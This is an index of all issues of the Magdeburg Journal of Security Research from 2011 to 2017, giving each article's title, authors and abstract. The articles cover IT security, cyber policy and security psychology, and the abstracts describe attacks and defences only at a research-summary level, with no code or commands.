Alle Ausgaben des Magdeburger Journals zur Sicherheitsforschung

All Issues of the Magdeburg Journal of Security Research

1. Ausgabe, 1. Jahrgang, Band 1, 2011

  • Die psychologischen Grundlagen des Social Engineerings
    Stefan Schumacher
    Social-Engineering ist eine Angriffsstrategie, die nicht die Technik als Opfer auserkorenhat. Stattdessen wird hier viel lieber – und vor allem effizienter – der Mensch, bzw.sein Verhalten angegriffen. Dieser Artikel zeigt, wie Social-Engineering funktioniert underklärt die zugrundeliegenden Tricks anhand sozialpsychologischer Studien und Experimente.Außerdem werden Beispiele, Warnsignale und Gegenmaßnahmen vorgestellt.Er richtet sich an Sicherheitsverantwortliche und Systemadministratoren, die verstehenwollen, wie Social-Engineering funktioniert und dieses Wissen in ihre Sicherheitsmaßnahmenintegrieren wollen.
  • Die Europäische Sicherheitsstrategie 2003. Europas Versuch einer Positionierung als eigenständiger sicherheitspolitischer Akteur (Essay)
    Jan W. Meine
    In diesem Essay wird die Europäische Sicherheitsstrategie von 2003 untersucht und als Versuch Europas identifiziert, sich als eigenständiger sicherheitspolitischer Akteur zu etablieren. Dabei bildet die National Security Strategy der USA von 2002 ein Referenzpunkt.
  • Die Außen- und Friedenspolitik des Heiligen Stuhls. Ein systematisierender Überblick
    Mathias Bethke
    Der Vatikan fasziniert. Filme wie „Illuminati“ locken Millionen in die Kinos, versprechen sie doch einen Blick hinter die dicken Mauern von Sankt Peter. Den Vatikan umweht beinahe etwas mystisches. Und doch ist er zugleich auch eine sehr weltliche Organisation, ja auch ein politischer Akteur – und dies vor allem auf dem internationalen Parkett. Die Bilder des leidenden Papstes neben dem zum Krieg entschlossenen US-Präsidenten gingen um die Welt. In diesem Artikel wird nun die Außen- und Friedenspolitik des Heiligen Stuhls unter besonderer Berücksichtigung der institutionellen wie auch der theologischen Grundlagen dargestellt. Darüber hinaus gilt es, auch die friedenspolitische Praxis des Heiligen Stuhls zu illustrieren, bevor abschließend – vor dem Hintergrund des vatikanischen Engagements gegen den Irak-Krieg – eine erste Antwort auf die Frage gesucht wird, wie mächtig der Heilige Stuhl ist.
  • Daten sicher löschen
    Stefan Schumacher
    Die Hauptaufgabe eines Systemadministrators sind Schutz und Verfügbarmachung von Daten. Doch Daten müssen teilweise wieder sicher vernichtet werden. Dies ist beispielsweise der Fall, wenn alte Rechner oder Datenträger ausgesondert werden oder gesetzliche Aufbewahrungsfristen überschritten werden. In diesem Artikel wird gezeigt, welche Methoden zur sicheren Datenlöschung existieren, was bei den verschiedenen Datenträgern zu beachten ist und wie man die Datenvernichtung bereits im Vorfeld plant.
  • Über den Umgang mit Unsicherheit.
    Dr. Hubert Feyrer
    Anhand der aktuellen Sicherheits-Situation werden die Begriffe »Sicherheit« und »Unsicherheit« diskutiert, und drei Beispiele für Unsicherheit exemplarisch gezeigt. Der Umgang mit Unsicherheit wird mit Hilfe von von praktischen Gegenmaßnahmen illustriert. Im Fazit wird geschlossen, daß Sicherheit nicht allein durch eine rein technische Lösung herbeigeführt werden kann.

Nach oben

2. Ausgabe, 1. Jahrgang, Band 2, 2011

  • Datenschutz, IT-Sicherheit, Betriebsschutz: Unternehmensentscheidungen zwischen gesetzlichem Zwang und betrieblicher Notwendigkeit
    Robert Kudrass
    Dieser Artikel setzt sich mit dem Risiko des Datendiebstahls über Firmennetzwerke auseinander und wie Konzerne immer wieder Opfer von Hackerangriffen werden. Ein angemessenes Datensicherheitssystems kann über die Firmenexistenz entscheiden.
  • Sicherheitsumfeld Cyber-Space: Abhängigkeiten, Akteure, Herausforderungen und Perspektiven
    Felix F. Seidler
    In diesem Artikel wird der Wandel der Sicherheitspolitik im Cyber-Space, ausgehend von einer zunehmenden Vernetzung sämtlicher elektronischer Geräte, thematisiert. Die staatliche Sicherheitspolitik bleibt davon zukünftig nicht unberührt.
  • Einführung in die Forschungsthematik der verdeckten Kanäle
    Steffen Wendzel und Jörg Keller
    Verdeckte Kanäle stellen eine bisher nur wenig außerhalb der Forschung betrachtete Technik für unzensierte Kommunikation dar. Zugleich liegt in verdeckten Kanälen die Gefahr des unbemerkten Informationsverlusts (Data Leakage) und der unbemerkten Steuerung von Botnetzen. Dieser Artikel bietet zunächst eine Einführung in die Thematik der verdeckten Kanäle, ihre Risiken und Chancen. Anschließend werden exemplarisch einzelne Techniken zur Erzeugung von verdeckten Kanälen vorgestellt, sowie gängige Gegenmaßnahmen diskutiert. Der Artikel schließt mit einem Überblick über neuere Techniken der letzten Jahre.
  • Systemcalls mit Systrace steuern
    Stefan Schumacher
    Systrace ermöglicht die Überwachung und Steuerung von Systemaufrufen. Dazu benutzt es Richtlinien, die für jedes verwendete Programm definiert werden. Anhand dieser Richtlinie werden Systemaufrufe erlaubt oder verboten. Ebenso kann man einzelne Systemaufrufe unter anderen Benutzerrechten ausführen. Somit ist es möglich, SETUID-Programme als unpriviliegierter Benutzer auszuführen und nur bestimmte Systemaufrufe mit Root-Rechten auszuführen. Systrace erlaubt daher die Implementierung einer feingranulierten Sicherheitsrichtlinie, die sogar Argumente von Systemaufrufen überprüfen kann.

3. Ausgabe, 2. Jahrgang, Band 1, 2012

  • Die Sicherheitsarchitektur der EU im Wandel – Die geplante parlamentarische Kontrolle der Sicherheits- und Nachrichtendienste in der Europäischen Union durch das Europa-Parlament
    Günther K. Weiße
    Das Generaldirektorat für Innenpolitik der EU-Kommission hat in einer Studie die parlamentarische Kontrolle der Sicherheits- und Nachrichtendienste in den Staaten der Europäischen Union durch das Genfer Institut zur demokratischen Kontrolle der Streitkräfte (Centre for the Democratic Control of Armed Forces - DCAF)  und das European Union Institute - EUI  untersuchen lassen. Dieses offizielle, 446 Seiten umfassende Papier enthält eine Vielzahl von Vorschlägen zur Angleichung der parlamentarischen Kontrolle von Sicherheits- und Nachrichtendiensten in der EU. Diese Vorschläge berühren massiv die Souveränitätsrechte der Nationalstaaten in der Union und zielen damit langfristig  auf die Einführung einer Sicherheits- und Nachrichtendienststruktur unter Kontrolle der Europäischen Union ab.
  • IT-Sicherheit in der öffentlichen Wahrnehmung
    Kristin Krüger
    In der deutschen sicherheitspolitischen Debatte nimmt das Thema Sicherheit in der Informationstechnologie (IT) einen immer größeren Raum ein. Vor allem seit Stuxnet hat sich die öffentliche Wahrnehmung dieses Problemfeldes deutlich intensiviert. Auf welchen Ebenen das Thema IT-Sicherheit diskutiert wird und welche Meinungen die Öffentlichkeit zu diesem komplexen Thema hat, soll in diesem Aufsatz analysiert werden.
  • Anonymität im Internet
    Jens Kubieziel
    Der Artikel stellt verschiedene Möglichkeiten der Anonymisierung im Internet vor und zeigt deren historische Entwicklung.
  • Eine Geschichte der Hackerkultur - Subkultur im Digitalen Zeitalter
    Jens Holze
    Aus Sicht der Bildungsforschung können Medien essentieller Katalysator für unser Selbst- und Weltbild sein. Der Beitrag argumentiert am Beispiel der Hackerkultur, dass konkrete Ausprägungen von Medienstrukturen dem Denken der Menschen und damit den Werten der Kultur entstammen, durch die sie erschaffen wurden. Im Kontext eines modernen Sicherheitsbegriffs scheinen die neuen sozialen Räume des Cyberspace auch zur Herausforderung für die gesamte Gesellschaft zu werden.

4. Ausgabe, 2. Jahrgang, Band 2, 2012,

  • Timeo Danaos et dona ferentes: Zur Funktionsweise von Schadsoftware
    Stefan Schumacher
    Schadsoftware verschiedenster Art, von Viren über Würmer bis zu Trojanern, ist eine ernstzunehmende Gefahr für die Sicherheit aller IT-Systeme weltweit. Dieser Artikel stellt die Grundlegende Funktionsweisen vor und analysiert den Staatstrojaner genauer.
  • Penetrationstests mit Metasploit
    Michael Kohl
    Jede aus dem Internet erreichbare Maschine sieht sich früher oder später Angriffen aus- gesetzt. Dies gilt als unvermeidbare Tatsache, was aber nicht bedeuetet, dass man sich für solche Eventualitäten nicht rüsten kann. Möglich ist dies beispielsweise mittels so genannter »Penetrationstests«, wobei verschiedene Werkzeuge wie beispielsweise das hier besprochene »Metasploit Framework« zum Einsatz kommen.
  • Salafistische Propaganda im Internet. Von der reinen Mission bis zum globalen Jihad - Die wesentlichen ideentheoretischen Unterschiede unter den salafistischen Strömungen in Deutschland
    Dirk Baehr
    In Deutschland existieren zahlreiche salafistische Gruppierungen, die seit mehreren Jahren missio- nieren. Die Inhalte der salafistischen Propaganda, die mit Videos oder Büchern im Internet verbreitet wird, variiert zwischen dem puristisch-salafistischen Denken eines Hassan Dabbaghs bis zu der radikal-militanten Propaganda Eric Breiningers. In dem vorliegenden Aufsatz werden die verschiedenen Strömungen vorgestellt und darauf hingewiesen, dass es in Deutschland sowohl reine Missionsgruppen als auch militante Gruppierungen unter den Salafisten gibt. Da viele Salafisten im Internet anonym mit ihren Sympathisanten kommunizieren, gibt es Anhaltspunkte, welche salafistische Strömung nur Mission betreibt und welche den globalen Jihad propagiert. Anhand der Propaganda existiert eine der wenigen Möglichkeiten, die jihadi-salafistische Strö- mung von den anderen Strömungen zu unterscheiden. Denn bislang gibt es nur wenig offen zugängliches deutschsprachiges Material, welches die militante Intention aufzeigt oder verdeutlicht. Anhand der dreigliedrigen Typologie des Salafismus von dem amerikanischen Politikwissenschaftler Quentin Wiktorowicz werden die Aktivitäten der deutschen Salafisten im Internet analysiert.
  • Sichere Benutzer-Authentifikation an sensiblen IT-Systemen
    Frank Hofmann
    Verschiedenste technische Geräte und Dienste benötigen zur Authentifikation eines berechtigten Benutzers Zugangsdaten. In der Regel bestehen diese Zugangsdaten aus einem Benutzernamen und einem Passwort. Dieser Artikel stellt alternative Möglichkeiten vor, wie eToken, Smartcards und mTAN.
  • Vom Cyber-Kriege. Gibt es einen Krieg im Internet?
    Stefan »Kaishakunin« Schumacher
    Dieser Beitrag untersucht die Frage, ob ein Krieg im Cyberspace möglich ist. Dazu stütze ich mich auf die Kriegs-Definition die Clausewitz aufgestellt hat und wende diese auf die aktuelle Cyberwar-Diskussion an. Ich stelle die aktuellen technischen Möglichkeiten für Cyberattacken in einem kurzen Überblick vor und zeige, wie sich durch die ausbreitende Technik Angriffsvektoren für Cyberattacken öffnen. Außerdem zeige ich, welchen Einfluss die gegenwärtige Entwicklung auf militärische Strategien hat.
  • Angriffe und Verteidigungsstrategien für vertrauliche Kommunikation über Funkdienste
    Michael "MiKa" Kafka René "Lynx" Pfeiffer
    Dieses Dokument dient als Zusammenfassung mit Angabe weiterer Quellen zum Vortrag "Angriffe und Verteidigungsstrategien für vertrauliche Kommunikation über Funkdienste", gehalten am 9. IKT Sicherheitsseminar des österreichischen Abwehramtes. Es enthält eine Aufbereitung verschiedener Vorträge der letzten DeepSec-Konferenzen sowie Ergänzungen aus zwischenzeitlich publizierten Forschungsergebnissen.

  • Eine DIN für IT-Sicherheit?
    Dr. Hubert Feyrer
    Es wird ein Überblick über zentrale Begriffe sowie existierende Gesetze und Normen für den Bereich IT-Sicherheit gegeben. Dem folgt eine Vorstellung des Informations- sicherheitsmanagements nach ISO 27001, inklusive Betrachtung der technischen und organisatorischen Maßnahmen, aber auch der Integration des Faktors Mensch und des Managements von Risiken. Es wird gezeigt dass hier nicht nur eine DIN für IT-Sicherheit vorliegt, sondern ein internationaler Standard, der alle Bereiche der In- formationssicherheit abdeckt.

5. Ausgabe, 3. Jahrgang, Band 1, 2013

  • In eigener Sache
    Stefan Schumacher und Jörg Sambleben
    Editorial zur neuen Ausgabe.
  • Sicherheit durch Freiheit und Offenheit? - Ein Fallbeispiel.
    Dr. Hubert Feyrer
    Nach der Definition zentraler Begriffe wird das NetBSD Projekt mit seiner Governance sowie den Prozessen für Entwicklung und Sicherheit vorgestellt. Die Prozesse und ihre Ergebnisse werden vermessen, und die Fragestellung, ob Sicherheit durch Freiheit und Offenheit möglich ist, wird basierend auf dem vorliegenden Projekt beantwortet.
  • Vom Cyber-Frieden
    Stefan »Kaishakunin« Schumacher
    Der Artikel beschreibt den ersten Entwurf einer Strategie zur globalen Cyber-Sicherheit. Dabei lege ich einen besonderen Schwerpunkt auf die Handlungskompetenz der handelnden Akteure und die zugrunde liegende psychologische Forschung.
  • Zukünftige Handlungsspielräume in der Genese von »Sicherheitstechnologien«
    Simon Runkel und Jürgen Pohl
    Die Entwicklung neuer Technologien soll nach politischen Vorgaben neue Handlungsspielräume für ein sicheres und freieres Leben der Bürger in Zukunft eröffnen. Technologie ist nicht neutral, denn soziale Praktiken verändern sich und nehmen großen Einfluss auf die zukünftige Organisation unseres Lebens. Sicherheitstechnologien - wie dem beispielhaft diskutierten Evakuierungsassistent - ist eine prognostizierende Funktionalität gemein, um potentielle Gefahren abzuwehren. Damit ist Sicherheitstechnologien die Erwartung zukünftiger Gefahren immanent. Auf Basis einer postphänomenologisch-ethnografischen Beschreibung wird der Prozess einer High-Tech-Entwicklung erfasst und kritisch beleuchtet. Dabei wird im Rückgriff auf Heideggers Technikphilosophie in der Lesart von Don Ihde die politisch-normalisierende als auch nützliche Dimension von technischem Handeln betrachtet. Neben der Analyse der Wirkmächtigkeit technischer Entwicklungen wird ebenso die Nutzung von Leitbildern und Präskriptionen in der Technikgenese kritisch betrachtet. Schließlich wird eine Begriffswendung von Sicherheit zu Fürsorge versucht, die sich letztlich mit einer zukünftigen Vision von technischem Handeln im Horizont der Hoffnung eines demokratischen, gemeinschaftlichen Zusammenlebens verbindet.

6. Ausgabe, 3. Jahrgang, Band 2, 2013

  • Why Android SSL was downgraded from AES256-SHA to RC4-MD5 in late 2010
    Dr. Georg Lukas
    Android is using the combination of broken RC4 and MD5 as the first default cipher on all SSL connections. This impacts all apps that did not change the list of enabled ciphers (i.e. almost all existing apps). This paper investigates why RC4-MD5 is the default cipher, and why it replaced better ciphers which were in use prior to the Android 2.3 release in December 2010.
  • How bluetooth may jeopardize your privacy. An analysis of people behavioral patterns in the street.
    Verónica Valeros and Sebastián García
    Cell phones have become so personal that detecting them on the street means to detect the owners. By using the information of the phone along with its GPS position it is possible to record and analyze the behavioral patterns of the people in the street. Bluetooth devices are ubiquitous, but until recently, there were no tools to perform bluetooth wardriving with GPS position and behavioral analysis. A new tool called Bluedriving is presented for doing this type of bluetooth wardriving. Also, most people is not aware that their bluetooth device allows to abuse their privacy. The bludriving tool can visualize the devices on a map and set different alerts to follow people in the street. The tool is presented along with a large capture dataset and a deep privacy analysis. We conclude that it is possible to follow people in the street by detecting their bluetooth device.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • Rezension zu Schluss mit Cybermobbing! Das Trainings- und Präventionsprogramm »Surf-Fair«. von Stephanie Pieschl und Torsten Porsch
    Jens Holze
    Eine Rezension zu Schluss mit Cybermobbing!
  • Design and Implementation of an IPv6 Plugin for the Snort Intrusion Detection System
    Martin Schütte
    This work describes the implementation and use of a preprocessor module for the popular open source Intrusion Detection System Snort that detects attacks against the IPv6 Neighbor Discovery Protocol. The implementation utilizes the existing preprocessor APIs for the extension of Snort and provides several new IPv6-specific rule options that can be used to define IPv6 related attack signatures. The developed module is aimed at the detection of suspicious activity in local IPv6 networks and can detect misconfigured network elements, as well as malicious activities from attackers on the network. The plugin's source code is available at https://github.com/mschuett/spp_ipv6

7. Ausgabe, 4. Jahrgang, Band 1, 2014

  • Hacking Medical Devices
    Florian Grunow
    In the last few years we have seen an increase of high tech medical devices, including all flavors of communication capabilities. The need of hospitals and patients to transfer data from devices to a central health information system makes the use of a wide range of communication protocols absolutely essential. This results in an increasing complexity of the devices which also increases the attack surface of these devices. We decided to take a look at a few devices that are deployed in many major German hospitals and probably in hospitals around the world. We will focus on the security of these devices and the impact on the patient’s safety. The results will be presented in this talk.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • Das IT-Weiterbildungssystem und IT-Sicherheit
    Stefan Schumacher
    Seit 1997 existieren die neuen/neugeordneten IT-Ausbildungsberufe (Fachinformatiker, IT-Systemelektroniker etc.) welche berufliche Handlungskompetenzen im IT-Umfeld vermitteln sollen. Der Artikel stellt geeignete Weiterbildungsmaßnahmen und Aufstiegsfortbildungen im Rahmen des sogenannten IT-Weiterbildungssystems vor. Dieses beinhaltet unter anderem auch die Möglichkeit, sich als Specialist zum IT Security Coordinator weiterbilden zu lassen.

8. Ausgabe, 4. Jahrgang, Band 2, 2014

  • Sexy Defense: Maximizing the home-field advantage
    Iftach Ian Amit
    Offensive security is easy, I know. But the goal of offensive security at the end of the day is to make us better defenders. And that’s hard. Usually after the pen-testers/auditors (or worst – red team) leaves, there’s a whole lot of mess of vulnerabilities, exposures, threats, risks and wounded egos. Now comes the money time – can you fix this so your security posture will actually be better the next time these guys come around?
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • Social Authentication: Vulnerabilities, Mitigations, and Redesign
    Marco Lancini
    High-value services have introduced two-factor authentication to prevent adversaries from compromising accounts using stolen credentials. Facebook has recently released a two-factor authentication mechanism, referred to as Social Authentication (SA). We designed and implemented an automated system able to break the SA, to demonstrate the feasibility of carrying out large-scale attacks against social authentication with minimal effort on behalf of an attacker. We then revisited the SA concept and propose reSA, a two-factor authentication scheme that can be easily solved by humans but is robust against face-recognition software.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • An innovative and comprehensive framework for Social Vulnerability Assessment
    Enrico Frumento & Roberto Puricelli
    Nowadays security attacks greatly rely on the human vulnerabilities, hence is fundamental to include the human factor into corporate risk analysis. However, is it possible to evaluate this risk through a specific type of vulnerability assessments? Since 2010, we have been working on the extension of traditional security as- sessment, going beyond the technology and including the “Social” context. In these years, we assessed several big European enterprises, understanding the impact of these activities on the relations among employees and employer, both from ethical and legal points of view. We developed a innovative methodology for Social Driven Vulnerability Assessments (SDVAs) that we present in this paper beside the early results. As part of their Advanced Threat Protection (ATP) programs, we performed more than 15 SDVAs in big enterprises with a gross number of 12.000 employees; this gave us a first-hand sight on the real vulnerabilities against modern non-conventional security threats.

    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer

9. Ausgabe, 5. Jahrgang, Band 1, 2015

  • Java’s SSLSocket: How Bad APIs Compromise Security
    Dr. Georg Lukas
    Internet security is hard. TLS is almost impossible. Implementing TLS correctly in Java is »Nightmare!«. This paper will show how a badly designed security API introduced over 15 years ago, combined with misleading documentation and developers unaware of security challenges, causes modern smartphone applications to be left exposed to Man-in-the-Middle attacks.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • IPv6 Security: Attacks and Countermeasures in a Nutshell
    Johanna Ullrich, Katharina Krombholz, Heidelinde Hobel, Adrian Dabrowski, Edgar Weippl
    The history of computers is full of underestimation: 640 kilobyte, 2-digit years, and 32-bit Internet addresses. IPv6 was invented to overcome the latter as well as to revise other drawbacks and security vulnerabilities of its predecessor IPv4. Initially considered the savior in terms of security because of its mandatory IPsec support, it turned out not to be the panacea it was thought to be. Outsourcing security to IPsec but eventually removing it as well as other design decisions led to a number of vulnerabilities. They range from the already known spoofing of answers to link-layer address requests to novel possibilities regarding node tracking. In an effort to fix them, a vast amount of updates have been introduced. In this paper, we discuss security and privacy vulnerabilities with regard to IPv6 and their current counter-measures. In a second step, vulnerabilities and countermeasures are systematized by the appliance of an extendible common language for computer security incidents. Our evaluation shows that a large part of vulnerabilities can be mitigated but several security challenges remain. We deduce three main research challenges for IPv6 security, namely address assignment and structure, securing local network discovery, and address selection for reconnaissance. This is a reprint of the authors’ article published in the 8th USENIX Workshop on Offensive Technologies (WOOT),
    2014.

    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • Trusting Your Cloud Provider: Protecting Private Virtual Machines
    Armin Simma
    This article proposes an integrated solution that allows cloud customers to increase their trust into the cloud provider including cloud insiders (e.g. administrators). It is based on Mandatory Access Control and Trusted Computing technologies, namely Measured Boot, Attestation and Sealing. It gives customers strong guaran- tees about the provider’s host system and binds encrypted virtual machines to the previously attested host. 
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer

10. Ausgabe, 5. Jahrgang, Band 2, 2015

  • Why Anti-Virus Software Fails
    Daniel Sauder
    Based on my work about antivirus evasion techniques, I started using antivirus evasion techniques for testing the effectivity of antivirus engines. I researched the internal functionality of antivirus products, especially the
    implementation of heuristics by sandboxing and emulation and succeeded in evasion of these.
    A result of my research are tests, if a shellcode runs within a x86 emulation engine. One test works by encrypting the payload, which is recognized as malicious normally. When the payload is recognized by the antivirus software, chances are high, that x86 emulation was performed.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • The Compromised Devices of the Carna Botnet - As used for the Internet Census 2012
    Parth Shukla
    This article will showcase the latest analysis and the progress of industry collaboration on the problem of Internet facing devices that have default credential logins through telnet. The Carna Botnet, which was used to perform the first-ever map of the Internet – Internet Census 2012 – highlighted a major information security concern with devices that allow default credential login from the Internet by default. For more information on the Internet Census 2012, please refer to the anonymous researcher’s paper.
    A complete list of compromised devices that formed part of the Carna Botnet was obtained exclusively by Parth Shukla. This list is NOT publicly available from any source. This data was acquired directly from the anonymous researcher who performed the Internet Census. As confirmed by the researcher, AusCERT to date remains the only organization and researcher in the world that has the complete dataset. Relevant snippets of this data, however, have been provided to CERTs around the world in order to reduce the threat made explicit by the Carna Botnet.
    This article will provide a detailed analysis of all the different identifying information for each of the compromised devices that formed part of the Botnet. This detailed analysis will showcase the prevalence of easily-exploitable devices in different countries, regions and in different manufacturers. The ultimate aim of this article is to continue to draw public awareness to the larger concerns faced by information security professionals worldwide. Hopefully, this awareness will persuade manufacturers and even local ISPs to collaborate and address this problem. The Carna Botnet reminds us all that there are numerous, simpler vulnerabilities at risk of exploitation and in need of immediate attention.
    The contents of this paper were first released to AusCERT members on 20 August 2013 and to the public on 25 August 2013.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • From Misconceptions to Failure - Security and Privacy in US Cloud Computing FedRAMP Program
    Mikhail Utin, PhD
    This Articles considers practical implementations of  »Cloud Computing« (CC) and associated services (CCS) in the US FedRAMP program, which is expected to convert all the government IT services into »cloud« based ones.  We conducted the research on how this concept helps to secure information in IT infrastructures. In particular, we were interested to see how it provides security in such a large-scale implementation as the US government FedRAMP program.  The following papers were analysed: NIST SP-800-53 R4, NIST SP-800-37 R1, NIST SP-800-144, NIST SP-800-145, NIST SP-800-146 and FedRAMP. 
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • IT Security Compliance Management can make sense
    Adrian Wiesmann
    What kind of internal and external controls from regulations and other sources are there? What is IT-Risk and IT-Compliance management? Why and for whom does it matter? How can we handle it and how does compliance aggregation fit into the picture?
    We will then look at the SOMAP.org project which is an Open Source project working on tools to handle IT-Compliance aggregation and IT Security compliance management in general. We will discuss why compliance management is not only about hot air but can make sense when done right.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • Psychology of Security - A Research Programme
    Stefan Schumacher
    IT Security is often considered to be a technical problem. However, IT Security is about decisions made by humans and should therefore be researched with psychological methods. Technical/Engineering methods are not able to solve security problems.
    In this talk I will introduce the Institute's research programme about the Psychology of Security. We are going to research the psychological basics of IT security, including: How do people experience IT security? How are they motivated? How do they learn? Why do people tend to make the same mistakes again and again (Buffer Overflow, anyone?)? What can we do to prevent security incidents? Which curricula should be taught about IT security?
    It is based on the 2013 talk »Psychology of Security« and also incorporates parts of my
    2014 talk »Security in a Post NSA Age?« held at AUSCert Australia and »Why IT Security is
    fucked up and what we can do about it« held at Positive Hack Days Moscow.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer

11. Ausgabe, 6. Jahrgang, Band 1, 2016

  • IT-Sicherheit in der Wasserversorgung - Schutz kritischer Infrastrukturen
    Stefan Schumacher
    Informationstechnische Systeme werden in immer mehr industriellen Bereichen eingesetzt. Seien es klassische Regelungstechnische Systeme, SCADA oder Industrie 4.0 und das Internet der Dinge. Auch in der Wasserversorgung gewinnen Automatisierungstechnik und Informationstechnik immer mehr Bedeutung. Trotz des Einsatzes in dieser kritischen Infrastruktur kommt der IT-Sicherheit hier häufig nicht die notwendige Bedeutung zu.
  • Extending a Legacy Platform - Providing a Minimalistic, Secure Single-Sign-On-Library
    Bernhard Göschlberger and Sebastian Göttfert
    Despite decades of security research and authentication standards there is still a vast amount of systems with custom solutions and embedded user databases. Such systems are typically hard to securely integrate with others. We analysed an existing system of an organisation with approximately 12.000 sensitive user data records and uncovered severe vulnerabilities in their approach. We developed a minimal, secure Single-Sign-On-Solution and demonstrated the feasibility of implementing both a minimal Identity Provider and a minimal Service Provider with only a few lines of code. We provided a simple blueprint for an Identity Provider and an easy to use Service Provider Library. Therefore this organisation is now able to integrate arbitrary web based systems. Moreover, others can follow the proposed approach and tailor similar solutions at low cost.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • Civil Society Organisation (CSO) participation in the European Security Research Programme (ESRP)
    Frank Balzer and Christoph Henseler
    As one might expect, the interdisciplinary and multi-accessible area of the ESRP shows a broad variety of actors within its research projects.  But, in contradiction to Article 11 of the Lisbon Treaty, especially CSOs rarely participate as project partners. The following article provides an overview of the participation of CSOs in research projects in the ESRP during the period of the European Union's Seventh Framework Programme for Research (FP7).  The data and research was obtained within the FP7 project SecurePART. We have found differences along the lines of geographical regions, the quantity of project participations per country, and the quality of civil society representation of the various kinds of CSOs. These parameters should be taken into account when thinking of rules of representation for future CSO participation in security research on the European level. 
    NB: The SecurePART project has received funding from
    the European Union's Seventh Framework Programme for research, technological development and demonstration under grant
    agreement no 608039. The project's website can be found here: http://www.securepart.eu/

12. Ausgabe, 6. Jahrgang, Band 2, 2016

  • ZigBee Exploited: The good, the bad and the ugly
    Tobias Zillner
    The Internet of Things (IoT) is an emerging trend. IoT involves the integration of digital and wireless technologies in physical objects and systems, especially those historically unconnected, which are supposed to make our everyday life easy and convenient. One of the most widespread used wireless technologies to connect IoT devices is the ZigBee standard. This emerging technology needs to keep pace with customer demands for cheap, long-living and available devices. One of the major challenges besides user and industry acceptance is security.  However, security is very often sacrificed or neglected due to fear of reduced or limited usability or fear of breaking backwards compatibility.  This paper describes the actual applied security measures in ZigBee, highlights the included weaknesses and introduces a software framework that can be used to automatically audit ZigBee communication and the implementation of ZigBee security services for various vulnerabilities and exploit them. 
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • Bypassing McAfee’s Application Whitelisting for Critical Infrastructure Systems
    René Freingruber
    This paper describes the results of the research conducted by SEC Consult Vulnerability Lab on the security of McAfee Application Control. This product is an example of an application whitelisting solution which can be used to further harden critical systems such as server systems in SCADA environments or client systems with high security requirements like administrative workstations. Application whitelisting is a concept which works by whitelisting all installed software on a system and after that prevent the execution of not whitelisted software. This should prevent the execution of malware and therefore protect against advanced persistent threat (APT) attacks. McAfee Application Control is an example of such a software. It can be installed on any system, however, the main field of application is the protection of highly critical infrastructures. While the core feature of the product is application whitelisting, it also supports additional security features including write- and read-protection as well as different memory corruption protections.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • Applicability of Criminal Law and Jus ad Bellum to Cyber-Incidents
    Oscar Serrano & Florin-Răzvan Radu & Ele-Marit Eomois
    Despite current efforts to adapt existing legal instruments to regulate hostile activities in cyber space, there is uncertainty about the legal situation of actors affected by these actions. Part of this uncertainty is due to the fact that being the cyber domain technically complex, there is a strong need for collaboration between technical and legal subject matter experts, collaboration which is difficult to achieve.  This paper aims to narrow the gap existing between the legal work in the area and the technical situations that arise during the day to day defence of computer networks. With this purpose, it defines a taxonomy of possible cyber-incidents, and analyses the predictable consequences of each type of cyber-incident with the purpose of mapping cyber-incidents to either Jus ad Bellum or criminal law.  Not surprisingly, this mapping justifies that most cyber operations fall outside Jus ad Bellum and usually account only to harassment, criminal acts or espionage, and as such they shall be prosecuted using national or international criminal law. The paper identifies the very few cases in which cyber-incidents could theoretically account to an armed attack (i.e. a cyber-attack).
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • A Death in Athens -- The Inherent Vulnerability of »Lawful Intercept«
    James Bamford
    I will discuss the »Athens Affair,« the subject of a recent investigation by me in The Intercept. In 2004, the NSA and CIA worked secretly with the Greek government to subvert Vodafone and other telecom companies in order to conduct widespread eavesdropping during the 2004 Athens Summer Olympics. The NSA agreed, however, to remove the spyware once the games were over. But rather than remove it, they instead secretly turned it on the top members of the Greek government and members of the Greek public, including journalists.  When the covert operation was accidentally discovered, however, a Vodafone engineer involved was found dead, either by suicide or murder, and the death was officially connected to the bugging operation. I will show how the operation was pulled off, by recruiting an inside person, then subverting the company’s »lawful intercept« program, and transferring the data back to NSA headquarters at Fort Meade. The episode demonstrates the enormous vulnerability of widespread »lawful intercept« programs, and government backdoors in general, and also how the NSA often uses a »bait and switch« in its operations – promising to help find terrorists, but really spying on the host government and local population instead.
    This paper is a transcript of the talk held at DeepSec 2015
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer

13. Ausgabe, 7. Jahrgang, Band 1, 2017

